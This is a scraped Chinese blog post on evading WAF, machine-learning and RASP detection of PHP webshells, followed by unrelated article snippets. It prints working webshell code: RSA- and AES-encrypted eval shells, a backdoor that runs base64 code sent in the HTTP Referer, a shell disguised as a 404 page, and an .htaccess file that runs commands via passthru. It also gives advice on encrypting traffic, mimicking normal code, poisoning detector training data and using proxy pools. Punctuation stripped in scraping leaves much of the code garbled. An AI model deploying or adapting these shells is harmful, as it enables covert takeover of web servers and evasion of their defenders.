seo 网站 结构用wordpress 登录

bicheng/2026/1/24 23:06:37/文章来源:
seo 网站 结构,用wordpress 登录,简单的网页设计论文,最好的网站统计过流量检测 这里的流量检测就是在网络层的waf拦截到我们向webshell传输的数据包#xff0c;以及webshell返回的数据 包#xff0c;检测其中是否包含敏感信息的一种检测方式。如果是大马的情况下#xff0c;可以在大马中添加多处判断代码#xff0c;因此在执行大马提供的功…过流量检测 这里的流量检测就是在网络层的waf拦截到我们向webshell传输的数据包以及webshell返回的数据 包检测其中是否包含敏感信息的一种检测方式。如果是大马的情况下可以在大马中添加多处判断代码因此在执行大马提供的功能时不直接传递关键 字而是只传递标识位如 A 是端口扫描B 是 上传文件流量就可能为 actionA这可以在一定程度 上绕过检测。但过这种方式更加屡试不爽的方式就是在双端都进行非对称加解密操作这种方式WAF是绝对不敢拦 的因为他不可能解析的了数据包而且正常业务逻辑为了保证数据的完整性和保密性也会如此传递数据。 比较常见的使用 RSA 进行加密蚁剑 php shell $cmd $_POST[ant]; $publicKey EOF -----BEGIN PUBLIC KEY----- Input your Public Key -----END PUBLIC KEY----- EOF; $cmds explode(|, $cmd); $publicKey openssl_pkey_get_public($publicKey); $cmd ; foreach ($cmds as $value) { if (openssl_public_decrypt(base64_decode($value), $de, $publicKey)) { $cmd . $de; } } eval($cmd); 传递的数据格式为 使用AES加密冰蝎 php shell error_reporting(0); session_start(); if (isset($_GET[pass])) { $keysubstr(md5(uniqid(rand())),16); $_SESSION[k]$key; print $key; } else { $key$_SESSION[k]; $postfile_get_contents(php://input); if(!extension_loaded(openssl)) { $tbase64_.decode; $post$t($post.); for($i0;$istrlen($post);$i) { $post[$i] $post[$i]^$key[$i115]; } } else { $postopenssl_decrypt($post, AES128, $key); } $arrexplode(|,$post); $func$arr[0]; $params$arr[1]; class C{public function __construct($p) {eval($p.);}} new C($params); } 传递数据格式为 我想问问这谁敢拦啊 除了 RSA/AES/DES 等方式外你也可以自己变成编码/加密方式只要做到传输的数据除了你自己的控 制端鬼都认不出来那你就成功了此处需要注意的是一定要是双端加密也就是不管是请求包还是响应包都是密文双端都有加解密 的操作不然被WAF识别到了返回包里的敏感内容一样前功尽弃除了流量加密还有就是multipart分片发包在前一段时间的绕WAF技术上也是引起了广泛的讨论 在网上还见了一种层级请求编码运行PHP后门通过2个PHP文件实现。 ?php //1.php header(Content-type:text/html;charsetutf-8); parse_str($_SERVER[HTTP_REFERER], $a); if(reset($a) 10 count($a) 9) { eval(base64_decode(str_replace( , , implode(array_slice($a, 6))))); }第二个文件 ?php //2.php header(Content-type:text/html;charsetutf-8); //要执行的代码 $code CODE phpinfo(); CODE; //进行base64编码 $code base64_encode($code); //构造referer字符串 $referer a10babc34dree32fkmg{$code}hi; //后门url $url http://localhost/test1/1.php; $ch curl_init(); $options array( CURLOPT_URL $url, CURLOPT_HEADER FALSE, CURLOPT_RETURNTRANSFER TRUE, CURLOPT_REFERER $referer ); curl_setopt_array($ch, $options); echo curl_exec($ch);通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码来达到后门的效果一般waf对 referer这些检测要松一点或者没有检测。 流量层除了对流量本身的识别模式之外还有很多的识别方式比如访问时间、访问次数、访问人员等 等方面的综合判定都可以识别出异常这种情况下就要考虑到下面提到的匿名化攻击了。 过机器学习算法检测 随着科技发展现在越来越多的厂商开始尝试并使用机器学习算法进行恶意文件、恶意流量的检测 不论是使用分类算法、还是使用神经网络、深度学习、异常检测算法能想到的方式有几种 收集webshell作为训练样本训练好的模型进行分类本质上是黑名单训练典型的如One Class SVM 有针对性的收集正常PHP业务逻辑代码和流量进行白名单训练结合各项特征完全进行聚类算法基于统计学构建概率分布模型使用孤立森林等算法进行无监督的异常检测结合更高维度特征如威胁情报、黑客画像、攻击手法等等扩展特征维度弱化代码、流量本身 的权重占比 大多数实现的算法本质上都是提取相关特征进行识别这种情况下想要绕过检测和识别是稍微有点头 疼的因为有时候机器学习模型不需要认识你是恶意代码只需要发现你跟正常逻辑代码不同就可以 了但是由于PHP的诸多特性编写PHP代码的人员水平参差不齐编写习惯不同加上早期PHP面向过 程的编制占到了大多数因此在其中提取统一的相似性的成本和难度大大增加所以还是可以绕过的 大体的思路有几种 1.加密文件 对文件加密后机器学习算法的识别就产生了巨大的偏差在某些黑名单算法下无法有效识别但很容 易被静态检测报出威胁。 2.模拟正常业务代码逻辑 恶意webshell写的越像正常业务代码越容易绕过检测无论是静态检测还是机器学习算法对于流量层面模拟其他正常业务逻辑的传参方式必要时完全模拟其他参数的传递这样可以也可以 污染一些机器学习模型动态学习时的训练数据使用类、函数进行webshell编写增加代码互相调用的复杂度同时避免使用常见的webshell中常用的一些字符处理函数避免某些关键字在训练模型中出现频率较高 导致报警这部分根据不同的算法绕过的方式也是不同的需要视情况而定。 3.匿名化进攻 使用白IP进行攻击探测使用代理池分散恶意流量在正常业务访问时间进行探测降低其他维度对攻 击行为的标签来绕过多维度特征的机器学习算法的检测这部分超出了PHP代码本身不再进行讨论。 4.注释 使用注释进行PHP的混淆对检测源码的机器学习算法是一个巨大的挑战 虽然机器学习模型的杀伤力理论上远远大于基于规则的传统WAF但是实际上目前在效率和成本的衡量 上目前还是传统WAF占据主流可能某些大厂在样本数据庞大的情况下可能已经拥有了较好的模型但 是也不可能拿出来给你用基于PHP本身的灵活及动态性可以看到机器学习算法在不使用多维度多方 面的综合考量情况下很难发挥出好的作用。 RASP防御 PHP RASP方案是通过扩展模块实现对规则对应的恶意函数行为、上下文内容的判断和阻断可以说 RASP 在未来一段时间内将逐渐取代流量层 WAF 称为主流防御方式RASP 的技术核心就是一个词Hook但实际上最关键的并不是 Hook 动作的本身而是取决于 Hook 之后的操作安全开发人员根据自身经验进行的检测动作在php中调用 eval 等代码执行的函数最终会调用 php 内核的 zend_compile_string 函数因此只要 Hook 掉这个函数把动作限死一句话类的webshell都失效了这种情况下我们可以使用小马、大马直接把功能写出来就绕过了这个点但是既然是 RASP就没那 么简单。现在新版本的这些侵入式的防护产品除了 Hook 了代码执行这一块也一并把文件IO命令执行这些 都做了根据 web 文件的行为来判断是否是 webshell。典型的比如读取了非 web 目录下的文件执 行异常的命令等等。理论上只要 Hook 做的全检测规则想的全面确实是很难绕过的因为退一万步讲即使你成功上 传了webshell你执行的其他动作都是非常规的都是可以被检测的。但实际上安全开发人员也是人不一定能坐到面面俱到因此在相关技术没积累到十分成熟之前 根据实际情况还是可以试一试的。对于OpenRASP WebShell 沙盒检测已经有大佬 LandGrey 提出想法利用信息不对称性绕过检测地 址https://xz.aliyun.com/t/2335。 伪装 讨论了各种检测方式绕过之后还有一种绕过是针对人的绕过也就是针对一些管理员、开发人员或者 同行之间通过各种方式伪装自己的木马或多或少还是能起到一些作用的。 将页面伪装成404的木马 !DOCTYPE HTML PUBLIC -//IETF//DTD HTML 2.0//EN htmlhead title404 Not Found/title /headbody h1Not Found/h1 pThe requested URL was not found on this server./p /body/html ?php preg_replace(/[pageerror]/e,$_POST[error],saft); header(HTTP/1.1 404 Not Found); ? 图片马配合解析漏洞、htaccess、ini配置文件修改进行隐藏例如 Files ~ ^\.ht Order allow,deny Allow from all /Files RedirectMatch 403 .htaccess$ #.htaccess结尾的403错误这里是为了增加隐蔽性 AddType application/x-httpd-php .htaccess #给.htaccess映射php拓展 ### SHELL ### ?php echo \n;passthru($_GET[c]. 21); ?### KINDLE ### #恶意的php代码 使用方法:http://localhost/.htaccess/?cdir PHP大马编写 在简单了解了上述知识后为了练习 PHP 编码能力学以致用我花了一些时间编写了一个PHP大马 用作学习总结和免杀测试。 GITHUB地址: https://github.com/JosephTribbianni/Stitch 部分截图

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/87039.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

网站建设项目设计书建设部建造师网站

聚沙成塔每天进步一点点 ⭐ 专栏简介⭐ 水平居中布局⭐ 垂直居中布局⭐ 写在最后 ⭐ 专栏简介 前端入门之旅:探索Web开发的奇妙世界 记得点击上方或者右侧链接订阅本专栏哦 几何带你启航前端之旅 欢迎来到前端入门之旅!这个专栏是为那些对Web开发感兴趣…

做我的世界皮肤壁纸的网站江门做网站价格

目录 一、mapping属性 二、总结 一、mapping属性 mapping是对索引库中文档的约束,常见的mapping属性包括: type:字段数据类型,常见的简单类型有: 字符串: text (可分词的文本)、keyword (精确值,例如:品…

尚义住房和城乡规划建设局网站中国建设布网站

文章目录 嫌啰嗦直接看源码Q5 :PyTorch on CIFAR-10three_layer_convnet题面解析代码输出 Training a ConvNet题面解析代码输出 ThreeLayerConvNet题面解析代码输出 Train a Three-Layer ConvNet题面解析代码输出 Sequential API: Three-Layer ConvNet题面解析代码输出 CIFAR-1…

郑州网站建设招商网站的优化方案怎么写

一、LAMP平台概述: LAMP架构是目前成熟的企业网站应用模式之一,指的是协同工作的一整台系统和相关软件,能够提供动态web站点服务及其应用开发环境。LAMP是一个缩写词,具体包括Linux操作系统,Apache网站服务器&#xf…

沈阳网站设计开发seo关键词排名优化官网

按照官网 的提示,我开始安装faster rcnn,但是出现了很多问题,我将其汇总了起来,并提出了解决办法。 先说明一下我的配置: python : anaconda2linux: centos 6.9 安装faster rcnn请先参考:《cuda8cudnn4 F…

怎么自己做导购网站网站建设scyiyou

Flink任务一般为实时不断运行的任务,如果没有任务监控, 任务异常时无法第一时间处理会比较麻烦。 这里通过调用API接口方式来获取参数,实现任务监控。 Flink任务监控(基于API接口编写shell脚本) 一 flink-on-yarn 模式 二 编写she…

贵州做网站的提供网站建设定制

写在开头 欢迎阅读MySQL修炼手册的第12篇,今天我们将深入探讨MySQL中的视图,了解如何利用视图简化复杂查询并保护敏感数据。 1 视图的基本概念 在开始学习视图之前,让我们先了解一下视图的基本概念。视图是一种虚拟的表,它是基…

做网站的工具有哪些高爆传奇手机版

2023年12月5日-12月6日,由白鲸出海主办的【GTC2023 全球流量大会】在中国深圳盛大召开。 本次大会荟聚海内外优质企业品牌,以专业的“展会”形式,全方位呈现跨境出海的成果,探索多元化的跨境商业模式,大会涵盖社交娱乐…

为什么要用国外服务器做网站ADPR国际传媒网站建设

id属性 id属性具有唯一性&#xff0c;也就是说&#xff0c;在一个页面中相同的id只能出现一次。在不同的页面中&#xff0c;可以出现两个id相同的元素。 语法 <div id"text"> ...... </div> class属性 class&#xff0c;顾名思义&#xff0c;就是“类…

芜湖市建设银行支行网站网站结构如何优化

88W8997-A0-CBQ2E005-T 是业界尺寸最小、能效最高的MU-MIMO无线互连组合芯片&#xff0c;面向企业级和消费级市场。88W8997是业界首款全面支持Bluetooth 4.2以及未来Bluetooth 5.0全套功能的28nm 2 x 2 802.11ac Wave-2组合芯片。该器件实现了高达867Mbps的峰值数据传送速率&am…

建设部网站施工员查询昌大建设集团大老板

目录 &#x1f60a;前言 一.选择题 1.执行下面程序&#xff0c;正确的输出是&#xff08;c&#xff09; 2.以下不正确的定义语句是&#xff08; &#xff09; 3.test.c 文件中包括如下语句&#xff0c;文件中定义的四个变量中&#xff0c;是指针类型的变量为【多选】&a…

如何做情趣网站池州网站制作优化

golang的协程和通道&#xff0c;之前就看过了&#xff0c;一直没有很好的理解&#xff0c;所以一直也没记录&#xff0c;今天看书&#xff0c;看到有一个总结的章节&#xff0c;里面记录了一些注意事项&#xff0c;因此写个文档&#xff0c;记录一下&#xff0c;避免以后自己忘…

建站网哪个好哈尔滨建设银行网站首页

推荐阅读100套最新项目 最新ssmjava项目文档视频演示可运行源码分享 最新jspjava项目文档视频演示可运行源码分享 最新Spring Boot项目文档视频演示可运行源码分享 目录 前台功能效果图 骑手功能模块 商家功能模块 管理员功能登录前台功能效果图 用户功能模块 系统功能设…

毕业设计代写网站wordpress 工单插件

文章目录 应用需求场景记录过程1. 准备数据2. 给数据根据姓名分组&#xff0c;加上序号.3. 根据name分组成map结构4. 拆分map 应用需求场景 准备的数据是这样的&#xff1a; 需要将每个人的成绩显示在一行上&#xff0c;需要的结果如下&#xff0c;但是我的情况是课程有非常…

设计网站定制公司百度收录申请

我们知道依赖注入&#xff08;DI&#xff09;是一种实现对象及其协作者或依赖关系之间松散耦合的技术。 ASP.NET Core包含一个简单的内建容器来支持构造器注入。我们试图将DI的最佳实践带到.NET Core应用程序中&#xff0c;这表现在以下方面&#xff1a;构造器注入注册组件DI i…

三亚学做网站培训wordpress 拍卖插件

题目描述 输入n个整数&#xff0c;将其中的奇数和偶数分别显示出来&#xff08;1 < n < 30&#xff09; 输入 第一行&#xff1a;一个整数n。第二行&#xff1a;n个空格隔开的整数。 输出 第一行&#xff1a;若干个奇数。第二行&#xff1a;若干个偶数。&#xff08…

自助建站免费申请徐州网站制作怎么做

1、Service的种类 按运行地点分类&#xff1a; 类别区别 优点缺点 应用本地服务&#xff08;Local&#xff09;该服务依附在主进程上&#xff0c; 服务依附在主进程上而不是独立的进程&#xff0c;这样在一定程度上节约了资源&#xff0c;另外Local服务因为是在同一进程因此不…

做网站快速排名软件wordpress 插件反复安装

安装electron时候&#xff0c;出现RequestError:socket hang up这样的错误&#xff0c;找了半天很多方式都是用旧淘宝源&#xff0c;导致根本安装不上去。 在项目的根目录下创建.npmrc文件&#xff0c;添加以下内容 # registryhttps://mirrors.huaweicloud.com/repository/np…

做静态网站工资多少wordpress 薄荷主题

射频前端芯片在模拟芯片中&#xff0c;属于进入门槛较高、设计难度较大的细分领域&#xff0c;由于国内射频前端芯片行业起步较晚&#xff0c;其市场份额主要被外企所占据&#xff0c;而在国产化浪潮的推动下&#xff0c;上游厂商的射频前端产品及技术逐渐具备领先的竞争优势。…

seo移动网站页面怎么做电子商务适合女生学吗

最近很多朋友留言问&#xff0c;ufs3.1是什么&#xff0c;很重要吗&#xff1f;下面就由小编来给大家介绍一下手机上的ufs3.1是什么&#xff01;ufs是高端安卓手机&#xff0c;常用的储存协议&#xff0c;就好像我们电脑里的固态硬盘一样&#xff0c;速度越快&#xff0c;打开软…